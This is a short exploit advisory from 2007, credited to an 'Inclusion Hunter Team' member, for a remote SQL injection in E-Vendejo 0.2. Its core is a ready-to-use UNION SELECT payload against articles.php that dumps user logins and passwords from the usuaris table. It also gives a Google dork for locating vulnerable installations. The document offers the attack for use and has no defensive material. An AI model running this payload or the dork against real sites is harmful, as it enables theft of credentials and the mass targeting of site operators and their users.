######################################################################################### # # Inclusion Hunter Team # http://www.ihteam.net # # # [E-Vendejo 0.2] # # # Class: SQL Injection # Found: 29/10/2007 # Remote: Yes # Site: http://e-vendejo.mine.nu/?q=en/node/3 # Download: http://e-vendejo.mine.nu/?q=en/node/3 # Author: R00T[ATI] of IHTeam # Contact: r00t.ati@ihteam.net - http://www.ihteam.net # ######################################################################################### Exploit =================================================================================================================== articles.php?lingvo=ca&id=10 UNION ALL SELECT null,null,concat(usr_login,0x23,usr_pass),null,null FROM usuaris/* =================================================================================================================== DORK: allinurl:articles.php?lingvo= Thanks To: ================================= White_Sheep for his Bugs Hunter; =================================